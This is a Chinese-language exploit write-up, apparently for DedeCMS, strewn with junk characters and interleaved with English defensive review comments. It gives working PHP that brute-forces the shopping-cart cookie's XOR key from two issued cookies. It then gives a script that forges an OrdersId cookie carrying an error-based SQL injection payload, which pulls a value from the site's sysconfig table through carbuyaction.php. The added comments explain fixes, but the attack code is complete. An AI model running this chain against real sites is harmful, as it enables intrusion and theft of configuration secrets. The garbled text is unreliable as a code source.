www.xxx.com/plus/search.php?keyword=! H1 {( W3 P4 U& c3 G x" r
在 include/shopcar.class.php 中。
先看一下这个 shopcar 类是如何生成 cookie 的：
// shopcar::saveCookie — writes one cart cookie: an array value is first enCode()d,
// then the value is enCrypt()ed and set with a 36000-second lifetime on path '/'.
// Review: nothing on this page authenticates the cookie. Any value that the
// enCrypt()/deCrypt() pair round-trips is accepted, and the key recovery shown later
// in this write-up makes producing such a value cheap.
// Mitigation: keep cart state server-side keyed by the session, or append
// hash_hmac('sha256', $value, $serverSecret) and check it with hash_equals() on read.
// (The read path, getCookie()/deCrypt(), is not on this page.)
# N- ]$ X1 r' ] [239 function saveCookie($key,$value)0 o# ~) s9 J9 i0 E
240 {6 Q% y" }* k- R. s! ^7 Y. `/ H' _7 |
241 if(is_array($value)). f: t) P3 l9 ~5 T, J! L ^
242 {. [ T* R8 d1 P; R
243 $value = $this->enCrypt($this->enCode($value));8 n- \8 B( O( H& M1 v$ D% v
244 }2 J8 B' h6 d: Q, |9 t( y
245 else
# Z5 V: _& g4 B" j246 {
# n& l6 D/ F) N247 $value = $this->enCrypt($value);# z4 }3 L+ c$ m' Y! Z
248 }$ g6 ^2 l2 V9 {* @! C: M( M& i
// The 4-argument setcookie() call sets neither the Secure nor the HttpOnly flag.
249 setcookie($key,$value,time()+36000,’/');
. i2 T9 j: L# i3 K) Z# J& p N250 }. h4 S; |" M: `0 x8 S6 Q
简单地说，$key 就是 cookie 的 key，$value 就是 value；enCode 的作用是把数组转成 a=yy&b=cc&d=know 这样的查询字符串，关键在于 enCrypt 函数。
// shopcar::enCrypt — obfuscates $txt with a per-call random key, passes the result
// through setKey() and base64-encodes it.
// Review, in order of severity:
//  1. The key is md5(rand(0, 32000)) — at most 32001 distinct keys, so an offline search
//     of the whole key space is trivial (the write-up below does exactly that).
//  2. Each output position emits the key character itself ($encrypt_key[$ctr]) right
//     next to the XOR'd byte, so the key is not secret to whoever holds the cookie.
//  3. XOR with a repeating key gives no integrity; no MAC is visible anywhere on this page.
// srand()/rand() are not a CSPRNG; security-relevant randomness needs random_bytes().
// The fix is not local to this method: it needs an authenticated construction (HMAC over
// the plaintext, or an AEAD) and the unseen deCrypt() counterpart changed in step.
2 W4 W" C' v: }2 L) [* P+ S186 function enCrypt($txt) j. {: l9 `6 h# R
187 {+ J8 h' ~7 }. t5 K
188 srand((double)microtime() * 1000000);6 f6 y7 \$ h% f3 U( R
189 $encrypt_key = md5(rand(0, 32000));7 i( U8 e* l7 u: O/ a8 V2 r
190 $ctr = 0;' K: a7 {' E4 q: f
191 $tmp = ”;
9 }6 t* y! ]- r8 `; e z4 _: _192 for($i = 0; $i < strlen($txt); $i++)2 C! f( Z) f( _5 `
193 {
/ P! [; U% c% z7 S+ `194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;) s4 O4 _ D2 f9 `: ~6 O
// Key character is written in the clear, followed by plaintext XOR that same character.
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
5 R5 c6 Z1 R+ x; E; Q196 }
& K/ X5 w& d1 I- I- _- M \( c3 B" Q4 h197 return base64_encode($this->setKey($tmp));# N- _ \+ V+ n2 x+ K
198 }5 o& X3 J- W1 e K* J( C
// shopcar::setKey — repeating-key XOR of $txt with md5(strtolower($cfg_cookie_encode)).
// The pad is fixed per installation (global $cfg_cookie_encode) and XOR is its own
// inverse, so recovering it once lets a client forge every cart cookie until the
// configuration value is rotated.
// Review: a 32-character hex digest used as an XOR pad is not encryption, and the
// strtolower() before md5() only shrinks the effective key space further.
// When patching, rotate $cfg_cookie_encode and treat existing cart cookies as untrusted.
213 function setKey($txt)
" o/ d3 M. C) w214 {& _" k6 b+ S4 V! {* t0 E
215 global $cfg_cookie_encode;
5 {$ Q8 C% n& G% z0 {' W216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
2 o, _" F1 E+ v1 e4 E217 $ctr = 0;
2 U7 f3 b H2 u2 r/ i218 $tmp = ”;
' U; ~: ?/ @2 b& a: S219 for($i = 0; $i < strlen($txt); $i++)
" v4 J' g% y3 Z3 H! J6 ?) y220 {
9 S3 ?, X0 r `5 x: J4 U221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
1 `8 d( f! y2 g" Z222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];" D! n# U1 B% Z
223 }
, l; A! [+ V, h224 return $tmp;
7 b& J# S; |' {7 R H/ H( l8 D225 }9 D6 G( o/ x5 `2 i9 j
enCrypt 的参数 $txt 我们是可知的，返回值就是 cookie 的值，这个我们也是可知的。
然后到了 enCrypt 调用 setKey 时的参数 $tmp，这个参数在某种意义上我们也是可知的，因为 $encrypt_key = md5(rand(0, 32000)); 只有 32000 种可能，我们可以推出 32000 种可能的 $tmp，从而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。对了，忘记说了，我们的目的是推测出 setKey 中 $encrypt_key 的值，然后才能任意构造出购物车的 cookie。从推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中，简单过滤掉含非字母数字字符的 key，就只剩下几百个可能的 key；然后我们再重新下一次订单，再获取几百个可能的 key，两者取交集，得到最终的 key。
具体代码如下：
<?php
// Inputs for the key-recovery demonstration: two cookies the application issued for the
// same cart contents, and the enCode() plaintext behind them.
// Defender note: every input here is observable by the cookie holder — no secret is
// needed, which is precisely the weakness being demonstrated.
$ ^& {7 S. j5 J! X( I$ |' r$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here' p3 |$ W# J: J2 \
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
8 w+ }' Z' F! B4 v* w% ~$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
// reStrCode — XORs the first 32 bytes of the base64-decoded cookie with a candidate
// enCrypt() intermediate to recover the setKey() pad.
// Why it works: setKey() is XOR with a 32-character pad, so one known 32-byte
// plaintext/ciphertext pair yields the whole pad.
// Mitigation: authenticate cookies (HMAC) so a recovered pad is worthless, and never
// derive the pad from a fixed, lowercased configuration string.
/ ]& ~+ `$ K7 V8 \6 u D6 B. U5 ~function reStrCode($code,$string)8 E" i! N1 m+ I K9 O: H- Q$ N
{
6 l7 O- s# X5 {; o$code = base64_decode($code);' Q" d$ ?: m$ N" `8 A5 Q
$key = “”;; v% {: p/ e N
for($i=0 ; $i<32 ; $i++)
' t3 c: i9 u$ r! w{( U! T. m6 l0 d! m8 R: q) G% D$ V
$key .= $string[$i] ^ $code[$i];% p. {9 k6 ~% C2 r) @
}2 l7 H3 S+ ` Q, V; ^! `
return $key;" f! {+ G: _# B4 `
}8 y. }2 L. ^8 ?" B( ?" `
// getKeys — enumerates every enCrypt() session key the application can pick
// (md5(0..31999)), rebuilds the intermediate each would produce for $plantxt, and keeps
// the candidate pads that are purely alphanumeric.
// Defender note: the loop bound mirrors rand(0, 32000) in shopcar.class.php; 32000
// md5() calls is negligible work, which is why the scheme offers no protection.
// eregi() was removed in PHP 7 — this listing assumes a PHP 5 runtime.
function getKeys($cookie,$plantxt): g: Q' Q' y' \0 ^# O
{
" x) P1 ?7 q/ P" J( j- @- R$tmp = $cookie;
8 g# R( H2 C! E0 [9 D: W. |$results = array();; U2 C( b! a) k
for($j=0 ; $j < 32000; $j++)& z' h1 \2 U7 y! R( B q
{
) o2 {8 A& {/ e, Z O2 L9 F/ h4 [( q
$txt = $plantxt;
7 Z' J8 I3 P5 d1 Z4 t* ]1 f% ?$ctr = 0;/ w1 L! o5 C" a* k8 z' a" Z" P
$tmp = ”;
- |; u; o/ h. x6 l4 J" P, L( H$encrypt_key = md5($j);
// Same construction as shopcar::enCrypt — key character in the clear, then the XOR.
* L4 m3 S* b6 s% [for($i =0; $i < strlen($txt); $i ++)" N8 ?- f! F% j* D( A6 @ \
{6 H5 ]+ ^& P# C/ l8 Z
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;+ A. Z* P7 G( q; k3 [7 {8 {. ?
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
# b3 G3 B6 D! Y) G7 \! f$ _}
+ [- Z# p" V* h9 C# w- t$string = $tmp;
6 W( T- f1 J5 ~* d/ R$code = $cookie;8 d0 l1 h% {- k/ ]
$result = reStrCode($code,$string);% L4 b2 w) P0 k) p' L) o( a
// A real pad is an md5 hex digest, so anything outside [a-z0-9] is discarded.
if(eregi(‘^[a-z0-9]+$’,$result))
; B3 Y% a9 s# c4 y8 x0 r, i+ q{' W: @! Y$ r0 [' r7 ^2 c
echo $result.”\n”;
6 L* g U# l N# c t$ w$results[] = $result;
4 r; E% r/ D: T}8 K( m# K$ I- C, S
}2 O2 S; `$ @7 d- b! z. n' L7 U- Y1 |
return $results;+ P& f, {6 o- w# ^* x
}
// Intersect the candidate pads from the two cookies; the one common to both is the
// installation's md5(strtolower($cfg_cookie_encode)).
// Defender note: two samples suffice because the false candidates from each cookie are
// unrelated. Rotating $cfg_cookie_encode invalidates a recovered pad, but without an
// HMAC on the cookie the recovery can simply be repeated.
' y9 _* T4 U5 ?$results1 = getKeys($cookie1,$plantxt);9 J: F( E4 V# W" H
$results2 = getKeys($cookie2,$plantxt);
9 x6 M/ K. V, S1 Nprint “\n——————–real key————————–\n”;
4 ~- a0 ~7 \/ Uforeach($results1 as $test1)% C- a/ `- M9 J9 |; M2 B3 _
{
; ^- { W. S: t6 v; l& W- d uforeach($results2 as $test2)
' D) z6 K4 D# X) T; }+ `8 Y{. Q) o5 t8 V. X X, d
if($test1 == $test2)
3 B5 ?. O# N6 d0 y! g, A/ Q{; q0 x( K9 t! `( J; I# S
echo $test1.”\n”;
) L3 x2 Y+ \9 u' y}0 X7 C' F1 e/ c; ?9 @8 W
}
B1 g, c: o, B9 T4 M$ l" }}7 [& N) _% V% T) O! g
?>
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie，
plantxt 可以根据页面来自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出 md5(strtolower($cfg_cookie_encode))
得到这个 key 之后，我们就可以构造任意购物车的 cookie。
接着看
20 class MemberShops
/ x8 B) l5 n1 n: q$ b \7 }9 P+ Z21 {
// Order id for the current cart; __construct() below loads it from the "OrdersId" cookie,
// i.e. it is client-controlled unless validated.
; K6 \0 W! G' ]6 j22 var $OrdersId;
// Product id(s) for the cart; how it is populated is not on this page.
4 e5 M+ P2 ~, @, F7 d# h/ x% s, @8 F23 var $productsId;
- `! y w1 U" H9 h+ _24
// MemberShops::__construct — takes the order id straight from the "OrdersId" cookie and
// only falls back to MakeOrders() when that value is empty.
// Review: a cookie that decrypts to any non-empty string is accepted as the order id
// without validation; carbuyaction.php then interpolates it into SQL (its line 173 in
// the listing below). Validate here — reject anything that is not the expected order-id
// format — and use a parameterised query at the sink. getCookie() and MakeOrders() are
// not on this page.
+ C; x4 R7 ]4 ~; w6 O. N25 function __construct()# D; S5 ^1 W: D) G
26 {6 a* ~& ?$ {8 t' P
27 $this->OrdersId = $this->getCookie(“OrdersId”);
// empty() also treats "0" as empty, so an order id of "0" would trigger MakeOrders().
! g4 }0 H; K: X% ]6 P4 C28 if(empty($this->OrdersId))4 l$ @0 c( c! J7 M _
29 {2 V! I0 P: m' a9 q
30 $this->OrdersId = $this->MakeOrders();
0 P$ Z( X p. {6 i( @6 n31 }
. V. K- c! A: A. o8 s+ [32 }5 ^$ j' c2 B7 E$ O) ^) }1 t
发现 OrdersId 是从 cookie 里面获取的。
然后
/plus/carbuyaction.php 中的
// Cart object whose OrdersId comes from the client cookie (see MemberShops::__construct).
29 $cart = new MemberShops();
- f$ c, u6 o4 R9 i& y4 V39 $OrdersId = $cart->OrdersId; // order number for this request — untrusted: it originates in a cookie
……
// SQL injection sink: $OrdersId is client-controlled (cookie) and is interpolated into the
// query string. Fix: use a parameterised query, or strictly validate the value against the
// order-id format, before the SQL is built. The cookie weakness above is what makes the
// value controllable, but this query would be unsafe with any untrusted input.
2 p! t* U7 ]& F: l173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
接着我们就可以注入了。
通过下面的代码生成 cookie：
<?php
! H4 ^0 P/ ]4 E* g$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
+ F. }! h& M' x+ n6 _; K$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
// Local copy of shopcar::setKey with the recovered pad substituted for
// md5(strtolower($cfg_cookie_encode)); the XOR itself is unchanged.
// Defender note: that a client can reproduce this function byte-for-byte offline is the
// problem — a keyed MAC the client cannot compute is what the application lacks.
0 D2 f- A; x, p6 s) S& T7 Jfunction setKey($txt)
& U6 D2 X; ?# C1 _& u{
' U- k4 U3 G& @global $encrypt_key;* Q! E3 _3 z$ N z+ A: {! G* v& `
$ctr = 0;4 k; S _9 o% N& h, _
$tmp = ”;) j- E) }. ]5 {
for($i = 0; $i < strlen($txt); $i++)
- ?4 t q% g/ h4 h! A$ m{3 a7 i, r$ H! I: y
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
2 ^$ C% A: E j, p( m& c$ R$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
7 Y+ K9 y! [, i. B3 c, z5 z}4 j: `. U% ]' T, s/ m! a
return $tmp;
" d* N; j2 Y* q2 N$ ?! u5 o* ?" v$ j}3 s# I/ U1 h. h8 R+ ~3 h
// Copy of shopcar::enCrypt: same per-call rand() key and the same leakage of each key
// character into the output. Because the application also cannot tell its own output
// from this one, any cookie minted here is accepted on the server.
function enCrypt($txt), k* W- Y. k4 G% m
{7 ^7 v: B* B& E2 P2 c$ D4 O
srand((double)microtime() * 1000000);
% ~) w" |- X9 \8 U$encrypt_key = md5(rand(0, 32000));
% T+ q# _/ l$ T8 p$ctr = 0;
5 Y. _. U! [/ o. w0 G$tmp = ”;8 ?# |+ y! j0 L9 p% S% I9 L
for($i = 0; $i < strlen($txt); $i++)2 b3 a4 Z2 a: \. ]. o+ G& m0 N; N9 d
{9 c" X- i4 h# X5 f( u7 e0 A
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;2 ? Q# N8 k8 B/ G6 }
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
3 K% W5 F$ r* l: b' C# v( I% g} I% H4 h5 g5 C$ b
return base64_encode(setKey($tmp));
6 J& @; [6 l* |" D8 S6 F8 Q}1 c" T4 b' i! @/ N0 @: I/ ]
// Re-run enCrypt() until the base64 output contains no '+' (the test is strpos()
// truthiness) and print the resulting cookie value.
// Defender note: the only server-side control that would stop this is validation of
// OrdersId (format check plus a parameterised query) and an authenticated cookie.
for($dest =0;$dest = enCrypt($txt);)& }; K* F4 Q, H9 K; u" O1 w( P
{
5 s) J: I. F: R4 r: v, {if(!strpos($dest,’+'))
! [$ y. v" c* x0 W: `9 T( o% E{
6 O5 F' y1 f Y. h0 l/ bbreak;
7 g& k% u( a- s" e}
' ?; k! I5 W3 m+ e}$ ?" M- [ ^- v8 Z
echo $dest.”\n”;1 K# ^# h3 v3 C( G
?>% n( l9 j- a& J: x; p8 H4 O, A) P
+ D1 N' l2 b" v, e! X6 _ |